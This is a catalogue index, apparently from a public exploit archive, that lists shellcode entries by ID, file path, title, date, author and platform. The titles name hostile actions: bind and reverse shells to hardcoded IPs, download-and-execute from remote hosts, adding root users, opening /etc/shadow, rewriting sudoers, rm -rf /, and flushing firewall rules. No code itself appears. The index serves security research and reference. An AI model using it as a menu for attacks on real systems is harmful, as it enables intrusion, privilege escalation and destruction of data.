42646,shellcodes/arm/42646.c,"Linux/ARM (Raspberry Pi) - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (192 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm
42647,shellcodes/arm/42647.c,"Linux/ARM (Raspberry Pi) - Reverse TCP (192.168.0.12:4444/TCP) Shell (/bin/sh) Shellcode (160 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm
42791,shellcodes/linux_x86-64/42791.c,"Linux/x86-64 - mkdir() 'evil' Shellcode (30 bytes)",2017-09-25,"Touhid M.Shaikh",shellcode,linux_x86-64
42791,shellcodes/linux_x86-64/42791.c,"Linux/x86-64 - mkdir(evil) Shellcode (30 bytes)",2017-09-25,"Touhid M.Shaikh",shellcode,linux_x86-64
42977,shellcodes/linux_x86/42977.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (30 bytes)",2017-10-12,"Manuel Mancera",shellcode,linux_x86
42992,shellcodes/windows_x86-64/42992.c,"Windows x64 - API Hooking Shellcode (117 bytes)",2017-10-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
42992,shellcodes/windows_x86-64/42992.c,"Windows/x86-64 - API Hooking Shellcode (117 bytes)",2017-10-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
43463,shellcodes/linux_x86/43463.nasm,"Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes)",2018-01-04,"Hashim Jawad",shellcode,linux_x86

1 id file description date author type platform
17 13256 shellcodes/bsd/13256.c BSD/x86 - Reverse TCP (192.168.2.33:6969/TCP) Shell Shellcode (129 bytes) 2004-09-26 Sinan Eren shellcode bsd
18 13257 shellcodes/bsdi_x86/13257.txt BSDi/x86 - execve(/bin/sh) Shellcode (45 bytes) 2004-09-26 duke shellcode bsdi_x86
19 13258 shellcodes/bsdi_x86/13258.txt BSDi/x86 - execve(/bin/sh) Shellcode (46 bytes) 2004-09-26 vade79 shellcode bsdi_x86
20 13260 shellcodes/bsdi_x86/13260.c BSDi/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (97 bytes) BSDi/x86 - execve(/bin/sh) + ToUpper Encoded Shellcode (97 bytes) 2004-09-26 anonymous shellcode bsdi_x86
21 13261 shellcodes/freebsd/13261.txt FreeBSD x86 / x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes) 2009-04-13 c0d3_z3r0 shellcode freebsd
22 13262 shellcodes/freebsd_x86/13262.txt FreeBSD/x86 - setreuid + execve(pfctl -d) Shellcode (56 bytes) 2008-09-12 suN8Hclf shellcode freebsd_x86
23 13263 shellcodes/freebsd_x86/13263.txt FreeBSD/x86 - Reverse TCP (192.168.1.33:8000/TCP) cat /etc/passwd Shellcode (112 bytes) 2008-09-10 suN8Hclf shellcode freebsd_x86
24 13264 shellcodes/freebsd_x86/13264.txt FreeBSD/x86 - Kill All Processes Shellcode (12 bytes) 2008-09-09 suN8Hclf shellcode freebsd_x86
25 13265 shellcodes/freebsd_x86/13265.c FreeBSD/x86 - Reverse Connection (172.17.0.9:8000/TCP) + Receive Shellcode + Payload Loader + Return Results Null-Free Shellcode (90 bytes) 2008-09-05 sm4x shellcode freebsd_x86
26 13266 shellcodes/freebsd_x86/13266.asm FreeBSD/x86 - execve(/bin/cat /etc/master.passwd) Null-Free Shellcode (65 bytes) FreeBSD/x86 - execve(/bin/cat /etc/master.passwd) + Null-Free Shellcode (65 bytes) 2008-08-25 sm4x shellcode freebsd_x86
27 13267 shellcodes/freebsd_x86/13267.asm FreeBSD/x86 - Reverse TCP (127.0.0.1:8000/TCP) Shell (/bin/sh) + Null-Free Shellcode (89 bytes) 2008-08-21 sm4x shellcode freebsd_x86
28 13268 shellcodes/freebsd_x86/13268.asm FreeBSD/x86 - setuid(0) + execve(ipf -Fa) Shellcode (57 bytes) 2008-08-21 sm4x shellcode freebsd_x86
29 13269 shellcodes/freebsd_x86/13269.c FreeBSD/x86 - execve(/bin/sh) Encoded Shellcode (48 bytes) 2008-08-19 c0d3_z3r0 shellcode freebsd_x86
38 13278 shellcodes/freebsd_x86/13278.asm FreeBSD/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (102 bytes) 2004-09-26 Scrippie shellcode freebsd_x86
39 13279 shellcodes/freebsd_x86-64/13279.c FreeBSD/x86-64 - exec /bin/sh Shellcode (31 bytes) 2009-05-18 Hack'n Roll shellcode freebsd_x86-64
40 13280 shellcodes/freebsd_x86-64/13280.c FreeBSD/x86-64 - execve(/bin/sh) Shellcode (34 bytes) 2009-05-15 c0d3_z3r0 shellcode freebsd_x86-64
41 13281 shellcodes/generator/13281.c Linux/x86 - execve() Null-Free Shellcode (Generator) Linux/x86 - execve() + Null-Free Shellcode (Generator) 2009-06-29 certaindeath shellcode generator
42 13282 shellcodes/generator/13282.php Linux/x86 - Bind TCP Shell Shellcode (Generator) 2009-06-09 Jonathan Salwan shellcode generator
43 13283 shellcodes/generator/13283.php Windows XP SP1 - Bind TCP Shell Shellcode (Generator) Windows (XP SP1) - Bind TCP Shell Shellcode (Generator) 2009-06-09 Jonathan Salwan shellcode generator
44 13284 shellcodes/generator/13284.txt Linux - execve(/bin/sh) + Polymorphic + Printable ASCII Characters Shellcode (Generator) 2008-08-31 sorrow shellcode generator
45 13285 shellcodes/generator/13285.c Linux/x86 - Command Generator Null-Free Shellcode (Generator) Linux/x86 - Command Generator + Null-Free Shellcode (Generator) 2008-08-19 BlackLight shellcode generator
46 13286 shellcodes/generator/13286.c Windows - Reverse TCP (127.0.0.1:123/TCP) Shell + Alphanumeric Shellcode (Encoder/Decoder) (Generator) 2008-08-04 Avri Schneider shellcode generator
47 13288 shellcodes/generator/13288.c (Generator) - HTTP/1.x Requests Shellcode (18+/26+ bytes) Linux/x86 - HTTP/1.x Requests Shellcode (18+/26+ bytes) (Generator) 2006-10-22 izik shellcode generator
48 13289 shellcodes/generator/13289.c Windows x86 - Multi-Format Encoding Tool Shellcode (Generator) Windows/x86 - Multi-Format Encoding Tool Shellcode (Generator) 2005-12-16 Skylined shellcode generator
49 13290 shellcodes/ios/13290.txt iOS Version-independent - Null-Free Shellcode 2008-08-21 Andy Davis shellcode ios
50 13291 shellcodes/hardware/13291.txt Cisco IOS - New TTY + Privilege Level To 15 + Reverse (21/TCP) Virtual Terminal Shell Shellcode 2008-08-13 Gyan Chawdhary shellcode hardware
51 13292 shellcodes/hardware/13292.txt Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes) 2008-08-13 Varun Uppal shellcode hardware
82 13324 shellcodes/linux_x86/13324.c Linux/x86 - Read /etc/passwd Shellcode (65+ bytes) 2009-02-27 certaindeath shellcode linux_x86
83 13325 shellcodes/linux_x86/13325.c Linux/x86 - chmod 666 /etc/shadow + exit(0) Shellcode (30 bytes) 2009-02-20 Jonathan Salwan shellcode linux_x86
84 13326 shellcodes/linux_x86/13326.c Linux/x86 - killall5 Shellcode (34 bytes) 2009-02-04 Jonathan Salwan shellcode linux_x86
85 13327 shellcodes/linux_x86/13327.c Linux/x86 - PUSH reboot() Shellcode (30 bytes) Linux/x86 - reboot() + PUSH Shellcode (30 bytes) 2009-01-16 Jonathan Salwan shellcode linux_x86
86 13328 shellcodes/generator/13328.c Linux/x86 - Shellcode Obfuscator Null-Free (Generator) Linux/x86 - Shellcode Obfuscator + Null-Free (Generator) 2008-12-09 sm4x shellcode generator
87 13329 shellcodes/linux_x86/13329.c Linux/x86 - Reverse UDP tcpdump (54321/UDP) Live Packet Capture Shellcode (151 bytes) Linux/x86 - Reverse UDP (54321/UDP) tcpdump Live Packet Capture Shellcode (151 bytes) 2008-11-23 XenoMuta shellcode linux_x86
88 13330 shellcodes/linux_x86/13330.c Linux/x86 - Append RSA Key to /root/.ssh/authorized_keys2 Shellcode (295 bytes) 2008-11-23 XenoMuta shellcode linux_x86
89 13331 shellcodes/linux_x86/13331.c Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) For Full Access Shellcode (86 bytes) 2008-11-19 Rick shellcode linux_x86
90 13332 shellcodes/linux_x86/13332.c Linux/x86 - Promiscuous Mode Detector Shellcode (56 bytes) 2008-11-18 XenoMuta shellcode linux_x86
91 13333 shellcodes/linux_x86/13333.txt Linux/x86 - setuid(0) + execve(/bin/sh_0_0) Null-Free Shellcode (28 bytes) Linux/x86 - setuid(0) + execve(/bin/sh_0_0) + Null-Free Shellcode (28 bytes) 2008-11-13 sch3m4 shellcode linux_x86
92 13334 shellcodes/linux_x86/13334.txt Linux/x86 - setresuid(0_0_0) + /bin/sh Shellcode (35 bytes) 2008-09-29 sorrow shellcode linux_x86
93 13335 shellcodes/linux_x86/13335.c Linux/x86 - iopl(3) + asm(cli) + while(1){} Shellcode (12 bytes) 2008-09-17 dun shellcode linux_x86
94 13336 shellcodes/linux_x86/13336.c Linux/x86 - System Beep Shellcode (45 bytes) 2008-09-09 Thomas Rinsma shellcode linux_x86
95 13337 shellcodes/linux_x86/13337.c Linux/x86 - Reverse Connection (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes) Linux/x86 - Reverse TCP (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes) 2008-08-25 militan shellcode linux_x86
96 13338 shellcodes/linux_x86/13338.c Linux/x86 - setreuid(geteuid_ geteuid) + execve(/bin/sh) Shellcode (39 bytes) 2008-08-19 Reth shellcode linux_x86
97 13339 shellcodes/linux_x86/13339.asm Linux/x86 - Reverse TCP (8192/TCP) cat /etc/shadow Shellcode (155 bytes) 2008-08-18 0in shellcode linux_x86
98 13340 shellcodes/linux_x86/13340.c Linux/x86 - Reverse PHP (Writes to /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes) 2008-08-18 GS2008 shellcode linux_x86
101 13343 shellcodes/linux_x86/13343.asm Linux/x86 - Raw-Socket ICMP/Checksum Shell (/bin/sh) Shellcode (235 bytes) 2007-04-02 mu-b shellcode linux_x86
102 13344 shellcodes/linux_x86/13344.c Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (40 bytes) 2007-03-09 Kris Katterjohn shellcode linux_x86
103 13345 shellcodes/linux_x86/13345.c Linux/x86 - Kill All Processes Shellcode (11 bytes) 2007-03-09 Kris Katterjohn shellcode linux_x86
104 13346 shellcodes/linux_x86/13346.s Linux/x86 - execve() Read Shellcode (92 bytes) Linux/x86 - execve() + Read Shellcode (92 bytes) 2006-11-20 0ut0fbound shellcode linux_x86
105 13347 shellcodes/linux_x86/13347.c Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (40 bytes) 2006-11-17 Kris Katterjohn shellcode linux_x86
106 13348 shellcodes/linux_x86/13348.c Linux/x86 - Set System Time to 0 + exit() Shellcode (12 bytes) 2006-11-17 Kris Katterjohn shellcode linux_x86
107 13349 shellcodes/linux_x86/13349.c Linux/x86 - Add Root User (r00t) To /etc/passwd Shellcode (69 bytes) 2006-11-17 Kris Katterjohn shellcode linux_x86
110 13352 shellcodes/linux_x86/13352.c Linux/x86 - execve(rm -rf /) Shellcode (45 bytes) 2006-11-17 Kris Katterjohn shellcode linux_x86
111 13353 shellcodes/linux_x86/13353.c Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (28 bytes) 2006-11-16 Revenge shellcode linux_x86
112 13354 shellcodes/linux_x86/13354.c Linux/x86 - execve(/bin/sh) Shellcode (22 bytes) 2006-11-16 Revenge shellcode linux_x86
113 13355 shellcodes/linux_x86/13355.c Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() Null-Free Shellcode (111+ bytes) Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() + Null-Free Shellcode (111+ bytes) 2006-10-22 izik shellcode linux_x86
114 13356 shellcodes/linux_x86/13356.c Linux/x86 - setreuid + Executes Command Shellcode (49+ bytes) Linux/x86 - setreuid() + Executes Command Shellcode (49+ bytes) 2006-08-02 bunker shellcode linux_x86
115 13357 shellcodes/linux_x86/13357.c Linux/x86 - stdin re-open + /bin/sh exec Shellcode (39 bytes) 2006-07-20 Marco Ivaldi shellcode linux_x86
116 13358 shellcodes/linux_x86/13358.c Linux/x86 - execve(/bin/sh) (Re-Use Of Strings In .rodata) Shellcode (16 bytes) Linux/x86 - execve(/bin/sh) + Re-Use Of Strings In .rodata Shellcode (16 bytes) 2006-07-20 Marco Ivaldi shellcode linux_x86
117 13359 shellcodes/linux_x86/13359.c Linux/x86 - setuid(0) + /bin/sh execve() Shellcode (30 bytes) 2006-07-20 Marco Ivaldi shellcode linux_x86
118 13360 shellcodes/linux_x86/13360.c Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + setuid() Shellcode (96 bytes) 2006-07-20 Marco Ivaldi shellcode linux_x86
119 13361 shellcodes/linux_x86/13361.c Linux/x86 - Bind TCP (2707/TCP) Shell Shellcode (84 bytes) 2006-07-04 oveRet shellcode linux_x86
120 13362 shellcodes/linux_x86/13362.c Linux/x86 - execve() Diassembly Obfuscation Shellcode (32 bytes) Linux/x86 - execve() + Diassembly + Obfuscation Shellcode (32 bytes) 2006-05-14 BaCkSpAcE shellcode linux_x86
121 13363 shellcodes/linux_x86/13363.c Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (100 bytes) 2006-05-08 Benjamin Orozco shellcode linux_x86
122 13364 shellcodes/generator/13364.c Linux/x86 - Reverse TCP (192.168.13.22:31337/TCP) Shell (/bin/sh) Shellcode (82 bytes) (Generator) 2006-05-08 Benjamin Orozco shellcode generator
123 13365 shellcodes/linux_x86/13365.c Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (2) 2006-05-01 hophet shellcode linux_x86
136 13378 shellcodes/linux_x86/13378.c Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_ [/bin/sh_ NULL]) Shellcode (37 bytes) 2006-04-03 Gotfault Security shellcode linux_x86
137 13379 shellcodes/linux_x86/13379.c Linux/x86 - setreuid(0_0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (33 bytes) 2006-04-03 Gotfault Security shellcode linux_x86
138 13380 shellcodes/linux_x86/13380.c Linux/x86 - Download File (HTTP/1.x http://127.0.0.1:8081/foobar.bin) + Receive Shellcode + Payload Loader Shellcode (68+ bytes) 2006-03-12 izik shellcode linux_x86
139 13381 shellcodes/linux_x86/13381.c Linux/x86 - TCP Proxy (192.168.1.16:1280/TCP) All Connect() Null-Free Shellcode (236 bytes) Linux/x86 - TCP Proxy (192.168.1.16:1280/TCP) All Connect() + Null-Free Shellcode (236 bytes) 2006-02-07 phar shellcode linux_x86
140 13382 shellcodes/linux_x86/13382.c Linux/x86 - execve(/bin/sh) + Anti-IDS Shellcode (40 bytes) 2006-01-26 NicatiN shellcode linux_x86
141 13383 shellcodes/linux_x86/13383.c Linux/x86 (Intel x86 CPUID) - execve(/bin/sh) XORED Encoded Shellcode (41 bytes) Linux/x86 (Intel x86 CPUID) - execve(/bin/sh) + XORED Encoded Shellcode (41 bytes) 2006-01-25 izik shellcode linux_x86
142 13384 shellcodes/linux_x86/13384.c Linux/x86 - execve(/bin/sh) Shellcode +1 Encoded (39 bytes) Linux/x86 - execve(/bin/sh) Shellcode + 1 Encoded (39 bytes) 2006-01-25 izik shellcode linux_x86
143 13385 shellcodes/linux_x86/13385.c Linux/x86 - Add Root User (xtz) To /etc/passwd + No Password Shellcode (59 bytes) 2006-01-21 izik shellcode linux_x86
144 13386 shellcodes/linux_x86/13386.c Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve(/bin/sh) Shellcode (39 bytes) Linux/x86 - execve(/bin/sh) + Anti-Debug Trick (INT 3h trap) Shellcode (39 bytes) 2006-01-21 izik shellcode linux_x86
145 13387 shellcodes/linux_x86/13387.c Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (80 bytes) 2006-01-21 izik shellcode linux_x86
146 13388 shellcodes/linux_x86/13388.c Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (98 bytes) 2006-01-21 izik shellcode linux_x86
147 13389 shellcodes/linux_x86/13389.c Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes) Linux/x86 - Eject CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes) 2006-01-21 izik shellcode linux_x86
148 13390 shellcodes/linux_x86/13390.c Linux/x86 - Eject CD-Rom (Follows /dev/cdrom Symlink) + exit() Shellcode (40 bytes) 2006-01-21 izik shellcode linux_x86
149 13391 shellcodes/linux_x86/13391.c Linux/x86 - Eject/Close CD-Rom Loop (Follows /dev/cdrom Symlink) Shellcode (45 bytes) 2006-01-21 izik shellcode linux_x86
150 13392 shellcodes/linux_x86/13392.c Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (32 bytes) 2006-01-21 izik shellcode linux_x86
151 13393 shellcodes/linux_x86/13393.c Linux/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell Shellcode (74 bytes) 2006-01-21 izik shellcode linux_x86
152 13394 shellcodes/linux_x86/13394.c Linux/x86 - Normal Exit With Random (So To Speak) Return Value Shellcode (5 bytes) 2006-01-21 izik shellcode linux_x86
153 13395 shellcodes/linux_x86/13395.c Linux/x86 - getppid() + execve(/proc/pid/exe) Shellcode (51 bytes) 2006-01-21 izik shellcode linux_x86
154 13396 shellcodes/linux_x86/13396.c Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) + exit() Shellcode (4 bytes) Linux/x86 - (eax != 0 and edx == 0) + exit() Shellcode (4 bytes) 2006-01-21 izik shellcode linux_x86
155 13397 shellcodes/linux_x86/13397.c Linux/x86 - reboot() Shellcode (20 bytes) 2006-01-21 izik shellcode linux_x86
156 13398 shellcodes/linux_x86/13398.c Linux/x86 - setreuid(0_ 0) + execve(/bin/sh) Shellcode (31 bytes) 2006-01-21 izik shellcode linux_x86
157 13399 shellcodes/linux_x86/13399.c Linux/x86 - execve(/bin/sh) + PUSH Shellcode (23 bytes) 2006-01-21 izik shellcode linux_x86
163 13405 shellcodes/linux_x86/13405.c Linux/x86 - _exit(1) Shellcode (7 bytes) 2005-11-09 Charles Stevenson shellcode linux_x86
164 13406 shellcodes/linux_x86/13406.c Linux/x86 - read(0_buf_2541) + chmod(buf_4755) Shellcode (23 bytes) 2005-11-09 Charles Stevenson shellcode linux_x86
165 13407 shellcodes/linux_x86/13407.c Linux/x86 - write(0__Hello core!\n__12) + exit() Shellcode (36/43 bytes) 2005-11-09 Charles Stevenson shellcode linux_x86
166 13408 shellcodes/linux_x86/13408.c Linux/x86 - Snoop /dev/dsp Null-Free Shellcode (172 bytes) Linux/x86 - Snoop /dev/dsp + Null-Free Shellcode (172 bytes) 2005-11-04 phar shellcode linux_x86
167 13409 shellcodes/linux_x86/13409.c Linux/x86 - execve(/bin/sh) + Standard Opcode Array Payload Shellcode (21 bytes) 2005-09-15 c0ntex shellcode linux_x86
168 13410 shellcodes/linux_x86/13410.s Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (2) 2005-09-09 xort shellcode linux_x86
169 13411 shellcodes/linux_x86/13411.c Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (1) 2005-09-08 xort shellcode linux_x86
170 13412 shellcodes/linux_x86/13412.c Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (23 bytes) Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (23 bytes) 2005-09-04 BaCkSpAcE shellcode linux_x86
171 13413 shellcodes/linux_x86/13413.c Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (27 bytes) Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (27 bytes) 2005-08-25 amnesia shellcode linux_x86
172 13414 shellcodes/linux_x86/13414.c Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (45 bytes) Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (45 bytes) 2005-08-19 c0ntex shellcode linux_x86
173 13415 shellcodes/linux_x86/13415.c Linux/x86 - Break chroot (../ 20x Loop) + execve(/bin/sh) Shellcode (66 bytes) 2005-07-11 Okti shellcode linux_x86
174 13416 shellcodes/linux_x86/13416.txt Linux/x86 - upload + exec Shellcode (189 bytes) 2005-06-19 cybertronic shellcode linux_x86
175 13417 shellcodes/linux_x86/13417.c Linux/x86 - setreuid() + execve() Shellcode (31 bytes) 2004-12-26 oc192 shellcode linux_x86
176 13418 shellcodes/linux_x86/13418.c Linux/x86 - Alphanumeric Encoded Shellcode (64 bytes) 2004-12-22 xort shellcode linux_x86
177 13419 shellcodes/linux_x86/13419.c Linux/x86 - Alphanumeric Encoded (IMUL Method) Shellcode (88 bytes) Linux/x86 - Alphanumeric Encoded + IMUL Method Shellcode (88 bytes) 2004-12-22 xort shellcode linux_x86
178 13420 shellcodes/linux_x86/13420.c Linux/x86 - Self-Modifying Radical Shellcode (70 bytes) 2004-12-22 xort shellcode linux_x86
179 13421 shellcodes/linux_x86/13421.c Linux/x86 - Self-Modifying Magic Byte /bin/sh Shellcode (76 bytes) 2004-12-22 xort shellcode linux_x86
180 13422 shellcodes/linux_x86/13422.c Linux/x86 - execve() Shellcode (23 bytes) 2004-11-15 marcetam shellcode linux_x86
181 13423 shellcodes/linux_x86/13423.c Linux/x86 - execve(_/bin/ash__0_0) Shellcode (21 bytes) 2004-11-15 zasta shellcode linux_x86
182 13424 shellcodes/linux_x86/13424.txt Linux/x86 - execve(/bin/sh) + Alphanumeric Shellcode (392 bytes) 2004-09-26 RaiSe shellcode linux_x86
183 13425 shellcodes/linux_x86/13425.c Linux/IA32 - execve(/bin/sh) 0xff-Free Shellcode (45 bytes) Linux/IA32 - execve(/bin/sh) + 0xff-Free Shellcode (45 bytes) 2004-09-26 anathema shellcode linux_x86
184 13426 shellcodes/bsd_x86/13426.c BSD/x86 - symlink /bin/sh + XORing Encoded Shellcode (56 bytes) 2004-09-26 dev0id shellcode bsd_x86
185 13427 shellcodes/linux_x86/13427.c Linux/x86 - Bind TCP (5074/TCP) Shell + ToUpper Encoded Shellcode (226 bytes) 2004-09-26 Tora shellcode linux_x86
186 13428 shellcodes/linux_x86/13428.c Linux/x86 - Add Root User (t00r) To /etc/passwd + Anti-IDS Shellcode (116 bytes) 2004-09-26 Matias Sedalo shellcode linux_x86
190 13432 shellcodes/linux_x86/13432.c Linux/x86 - Execute At Shared Memory Shellcode (50 bytes) 2004-09-26 sloth shellcode linux_x86
191 13433 shellcodes/linux_x86/13433.c Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (45 bytes) 2004-09-26 UnboundeD shellcode linux_x86
192 13434 shellcodes/linux_x86/13434.c Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (58 bytes) 2004-09-26 dev0id shellcode linux_x86
193 13435 shellcodes/linux_x86/13435.c Linux/x86 - Reverse Telnet Shell (200.182.207.235) Shellcode (134 bytes) Linux/x86 - Reverse TCP (200.182.207.235/TCP) Telnet Shel Shellcode (134 bytes) 2004-09-26 hts shellcode linux_x86
194 13436 shellcodes/linux_x86/13436.c Linux/x86 - Reverse TCP Shell (/bin/sh) Shellcode (120 bytes) 2004-09-26 lamagra shellcode linux_x86
195 13437 shellcodes/linux_x86/13437.c Linux/x86 - chmod 666 /etc/shadow Shellcode (41 bytes) 2004-09-26 Matias Sedalo shellcode linux_x86
196 13438 shellcodes/linux_x86/13438.c Linux/x86 - cp /bin/sh /tmp/katy + chmod 4555 katy Shellcode (126 bytes) 2004-09-26 RaiSe shellcode linux_x86
212 13453 shellcodes/bsd_x86/13453.c BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) Shellcode (46 bytes) 2004-09-12 dev0id shellcode bsd_x86
213 13454 shellcodes/linux_x86/13454.c Linux/x86 - Break chroot + execve(/bin/sh) Shellcode (80 bytes) 2004-09-12 preedator shellcode linux_x86
214 13455 shellcodes/linux_x86/13455.c Linux/x86 - execve(/bin/sh) + Anti-IDS Shellcode (58 bytes) 2004-09-12 Matias Sedalo shellcode linux_x86
215 13456 shellcodes/linux_x86/13456.c Linux/x86 - execve(/bin/sh) XOR Encoded Shellcode (55 bytes) Linux/x86 - execve(/bin/sh) + XOR Encoded Shellcode (55 bytes) 2004-09-12 anonymous shellcode linux_x86
216 13457 shellcodes/linux_x86/13457.c Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (41 bytes) Linux/x86 - execve(/bin/sh) + ToLower Encoded Shellcode (41 bytes) 2004-09-12 anonymous shellcode linux_x86
217 13458 shellcodes/linux_x86/13458.c Linux/x86 - setreuid(0_0) + execve(/bin/sh) Shellcode (46+ bytes) 2001-05-07 Marco Ivaldi shellcode linux_x86
218 13460 shellcodes/linux_x86/13460.c Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (55 bytes) Linux/x86 - execve(/bin/sh) + ToLower Encoded Shellcode (55 bytes) 2000-08-08 anonymous shellcode linux_x86
219 13461 shellcodes/linux_x86/13461.c Linux/x86 - Add Root User (z) To /etc/passwd Shellcode (70 bytes) 2000-08-07 anonymous shellcode linux_x86
220 13462 shellcodes/linux_x86/13462.c Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve(/bin/sh) Shellcode (132 bytes) 2000-08-07 anonymous shellcode linux_x86
221 13463 shellcodes/linux_x86-64/13463.c Linux/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes) 2009-05-18 evil.xi4oyu shellcode linux_x86-64
238 13480 shellcodes/osx_ppc/13480.c OSX/PPC - Add Root User (r00t) Shellcode (219 bytes) 2004-09-26 B-r00t shellcode osx_ppc
239 13481 shellcodes/osx_ppc/13481.c OSX/PPC - execve(/bin/sh) Shellcode (72 bytes) 2004-09-26 B-r00t shellcode osx_ppc
240 13482 shellcodes/osx_ppc/13482.c OSX/PPC - Add inetd (/etc/inetd.conf) Backdoor (Bind 6969/TCP Shell) Shellcode (222 bytes) 2004-09-26 B-r00t shellcode osx_ppc
241 13483 shellcodes/osx_ppc/13483.c OSX/PPC - Reboot Shellcode (28 bytes) OSX/PPC - Reboot() Shellcode (28 bytes) 2004-09-26 B-r00t shellcode osx_ppc
242 13484 shellcodes/osx_ppc/13484.c OSX/PPC - setuid(0) + execve(/bin/sh) Shellcode (88 bytes) 2004-09-26 B-r00t shellcode osx_ppc
243 13485 shellcodes/osx_ppc/13485.c OSX/PPC - Create /tmp/suid Shellcode (122 bytes) 2004-09-26 B-r00t shellcode osx_ppc
244 13486 shellcodes/osx_ppc/13486.c OSX/PPC - Simple write() Shellcode (75 bytes) 2004-09-26 B-r00t shellcode osx_ppc
245 13487 shellcodes/osx_ppc/13487.c OSX/PPC - execve(/usr/X11R6/bin/xterm) Shellcode (141 bytes) 2004-09-26 B-r00t shellcode osx_ppc
246 13488 shellcodes/sco_x86/13488.c SCO/x86 - execve(_/bin/sh__ ..._ NULL) Shellcode (43 bytes) 2005-11-30 p. minervini shellcode sco_x86
247 13489 shellcodes/solaris_mips/13489.c Solaris/MIPS - Download (http://10.1.1.2:80/evil-dl) + Execute (/tmp/ff) Shellcode (278 bytes) Solaris/MIPS - Download File (http://10.1.1.2:80/evil-dl) + Execute (/tmp/ff) Shellcode (278 bytes) 2006-11-21 xort shellcode solaris_mips
248 13490 shellcodes/solaris_sparc/13490.c Solaris/SPARC - setreuid + Executes Command Shellcode (92+ bytes) Solaris/SPARC - setreuid() + Executes Command Shellcode (92+ bytes) 2006-10-21 bunker shellcode solaris_sparc
249 13491 shellcodes/generator/13491.c Solaris/MIPS - Reverse TCP (10.0.0.3:44434/TCP) Shell + XNOR Encoded Traffic Shellcode (600 bytes) (Generator) 2006-07-21 xort shellcode generator
250 13492 shellcodes/solaris_sparc/13492.c Solaris/SPARC - setreuid + execve() Shellcode (56 bytes) Solaris/SPARC - setreuid() + execve() Shellcode (56 bytes) 2005-11-20 lhall shellcode solaris_sparc
251 13493 shellcodes/solaris_sparc/13493.c Solaris/SPARC - Bind TCP (6666/TCP) Shell Shellcode (240 bytes) 2005-11-20 lhall shellcode solaris_sparc
252 13494 shellcodes/solaris_sparc/13494.txt Solaris/SPARC - execve(/bin/sh) Shellcode (52 bytes) 2004-09-26 LSD-PLaNET shellcode solaris_sparc
253 13495 shellcodes/solaris_sparc/13495.c Solaris/SPARC - Bind TCP (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes) 2004-09-26 Claes M. Nyberg shellcode solaris_sparc
254 13496 shellcodes/solaris_sparc/13496.c Solaris/SPARC - Reverse TCP (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes) 2004-09-26 Claes M. Nyberg shellcode solaris_sparc
255 13497 shellcodes/solaris_sparc/13497.txt Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes) 2000-11-19 dopesquad.net shellcode solaris_sparc
256 13498 shellcodes/generator/13498.php Solaris/x86 - Bind TCP Shell Shellcode (Generator) 2009-06-16 Jonathan Salwan shellcode generator
257 13499 shellcodes/solaris_x86/13499.c Solaris/x86 - setuid(0) + execve(/bin/sh) + exit(0) Null-Free Shellcode (39 bytes) Solaris/x86 - setuid(0) + execve(/bin/sh) + exit(0) + Null-Free Shellcode (39 bytes) 2008-12-02 sm4x shellcode solaris_x86
258 13500 shellcodes/solaris_x86/13500.c Solaris/x86 - setuid(0) + execve(/bin/cat_ /etc/shadow) + exit(0) Shellcode (59 bytes) 2008-12-02 sm4x shellcode solaris_x86
